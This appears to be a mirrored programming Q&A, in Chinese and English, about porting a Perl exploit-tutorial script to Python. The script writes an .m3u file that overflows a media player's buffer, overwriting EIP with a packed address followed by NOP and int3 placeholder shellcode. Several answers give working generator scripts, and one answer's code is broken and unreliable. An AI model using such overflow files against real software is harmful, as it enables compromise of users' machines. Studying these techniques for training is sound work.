当前位置: 文江博客 话题详情

Python 中 Perl 的 Pack('V') 函数?

发布于 2024-11-16 03:05:45 字数 884 浏览 3 评论 0 原文

我最近一直在进行一些漏洞利用开发,为培训课程做好准备,但我在教程中遇到了问题。我一直在遵循我能找到的所有教程,出于偏好,使用 Python 而不是教程使用的语言。我正在尝试对所有内容进行交叉编码,但我不知道如何对 Perl 的 Pack() 函数进行交叉编码。

长话短说: 我正在尝试将其翻译为 python:

my $file= "test1.m3u";
my $junk= "A" x 26094;
my $eip = pack('V',0x000ff730);  

my $shellcode = "\x90" x 25; 

$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25; 

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE)print "m3u File Created successfully\n";

我找到了 Python 的 struct.pack() 函数,但是当我使用 时

Fuzzed.write(struct.pack('V', 0x773D10A4))

,它会停止程序并且不起作用。我做错了什么?

这是我的全部源代码

import struct

Fuzzed = open('C:\Documents and Settings\Owner\Desktop\Fuzzed.m3u','w')
Fuzzed.write('A' * 26072)
string = str(struct.pack('V',0x773D10A4))
Fuzzed.write(string)
Fuzzed.write('C' * 3000)
原文

I've been working on some exploit development recently to get ready for a training course, and I've run into a problem with a tutorial. I've been following along with all the tutorials I can find, using Python as opposed to the language the tutorials used, out of preference. I'm trying to crosscode everything, but I can't figure out how to crosscode Perl's Pack() function.

TL;DR:
I'm trying to translate this to python:

my $file= "test1.m3u";
my $junk= "A" x 26094;
my $eip = pack('V',0x000ff730);  

my $shellcode = "\x90" x 25; 

$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25; 

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE)print "m3u File Created successfully\n";

I've found Python's struct.pack() function, but when I use 

Fuzzed.write(struct.pack('V', 0x773D10A4))

, it stops the program and doesn't work. What am I doing wrong?

This is my entire source code

import struct

Fuzzed = open('C:\Documents and Settings\Owner\Desktop\Fuzzed.m3u','w')
Fuzzed.write('A' * 26072)
string = str(struct.pack('V',0x773D10A4))
Fuzzed.write(string)
Fuzzed.write('C' * 3000)

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(5

信仰 2024-11-23 03:05:45

尝试使用“L<”包模板而不是“V”。这应该适用于 Perl 和 Python。 NV 是指定字节顺序的旧 Perl 方法,而 <> 是较新的方法。看起来当 Python 从 Perl 借用 pack 时,它只是采用了更新、更灵活的接口。

编辑:Python 想要< 在类型说明符之前,而 Perl 希望它在之后。不太兼容:(

Try using the "L<" pack template instead of "V". This should work in Perl and Python both. N and V are an older Perl method of specifying endianness, and < and > are the newer method. It looks like when Python borrowed pack from Perl it only took the newer, more flexible interface.

Edit: Python wants the < before the type specifier, while Perl wants it after. Not quite so compatible :(

回复 原文
熟人话多 2024-11-23 03:05:45

Python 的 struct.pack 使用第一个字符作为 字节序/大小变化,然后是 数据类型。 Perl 的 V 表示 32 位无符号 int/little-endian。

Python 的类似物是 struct.pack('

Python's struct.pack uses the first character for the endianess/size variation, and then one or more for the data type. Perl's V means 32bit unsigned int/little-endian.

The Python analogue is struct.pack('<I', 0x773D10A4).

回复 原文
江南月 2024-11-23 03:05:45

我已经翻译成 python 并且我已经尝试过 MP3 转换器。这是你的答案:

import sys
file = "8.m3u"
junk = "A"*26042
eip = "\X3A\XF2\XB5\X01" //0x01B5F23A
shellcode =" " 
shellcode += "\x90"*25
shellcode += "xcc"
shellcode += "\x90"*25
tmp = junk + eip + shellcode
D = open(file, 'w')
D.write(tmp)
D.close()
print "m3u File Created successfully\n"

i've already translated to python and i've already tried for MP3 converter. Here is your answer:

import sys
file = "8.m3u"
junk = "A"*26042
eip = "\X3A\XF2\XB5\X01" //0x01B5F23A
shellcode =" " 
shellcode += "\x90"*25
shellcode += "xcc"
shellcode += "\x90"*25
tmp = junk + eip + shellcode
D = open(file, 'w')
D.write(tmp)
D.close()
print "m3u File Created successfully\n"
回复 原文
肩上的翅膀 2024-11-23 03:05:45

这正是您想要的。培训课程怎么样?

import struct 


file = 'crash.m3u'
junk = b'\x41' * 26091
eip = struct.pack('<I', 0x1d5f23a)
preshellcode = b'\xcc' * 4
shellcode = b'\x90' * 25 + b'\xcc'
fp = open(file, 'wb')
fp.write(junk + eip + preshellcode + shellcode)
fp.close()

import binascii
print binascii.hexlify(open(file, 'rb').read())

print 'm3u file is ready'

This is exactly what you want. how about the training course?

import struct 


file = 'crash.m3u'
junk = b'\x41' * 26091
eip = struct.pack('<I', 0x1d5f23a)
preshellcode = b'\xcc' * 4
shellcode = b'\x90' * 25 + b'\xcc'
fp = open(file, 'wb')
fp.write(junk + eip + preshellcode + shellcode)
fp.close()

import binascii
print binascii.hexlify(open(file, 'rb').read())

print 'm3u file is ready'
回复 原文
酒浓于脸红 2024-11-23 03:05:45

我正在学习相同/相似的教程。尼克的回答对我来说完全有效。我还测试了在易受攻击的软件上创建的 m3u 文件。它确实有效,尽管我的 EIP 地址不同。我在 Linux 机器上使用 python 3.7.5 运行它。这是修改后的代码:

import struct

Fuzzed = open('Fuzzed.m3u','wb')
Fuzzed.write(b'A' * 26072)
string = struct.pack('<I',0x773D10A4)
Fuzzed.write(string)
Fuzzed.write(b'C' * 3000)

我们需要将所有内容转换为字节对象的原因是 pack 函数返回一个字节对象,并且我们无法将其与字符串连接。另外 str(struct.pack('

string = b'\xA4' + b'\x10' + b'\x3D' + b'\x77'

I was studying the same/similar tutorial. What fully worked for me is Nick's answer. I also tested the m3u file created on the vulnerable software. It really works, though my EIP address is different. I ran it using python 3.7.5 on linux machine. This is the modified code:

import struct

Fuzzed = open('Fuzzed.m3u','wb')
Fuzzed.write(b'A' * 26072)
string = struct.pack('<I',0x773D10A4)
Fuzzed.write(string)
Fuzzed.write(b'C' * 3000)

The reason why we need to convert everything to byte object is pack function returns a byte object and we cannot concatenate it with strings. Also str(struct.pack('<I',0x773D10A4)) doesn't work either. Instead of pack you could also use 0x773D10A4.to_bytes(4, 'little'). Another way is to manually rearrange the bytes:

string = b'\xA4' + b'\x10' + b'\x3D' + b'\x77'
回复 原文
~没有更多了~

关于作者

溺孤伤于心

暂无简介

0 文章
0 评论
23 人气
发私信

相关话题

更多

热门标签

操作系统 程序设计 IT运维 Linux系统管理 JavaScript 服务器应用 solaris C/C++ PHP Shell BSD Vue.js aix Oracle Python HTML 系统管理 HTML5 CSS 前端
更多

推荐作者

胡图图

文章 0 评论 0

zt006

文章 0 评论 0

z祗昰~

文章 0 评论 0

冰葑

文章 0 评论 0

野の

文章 0 评论 0

天空

文章 0 评论 0

更多

友情链接

文江博客
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文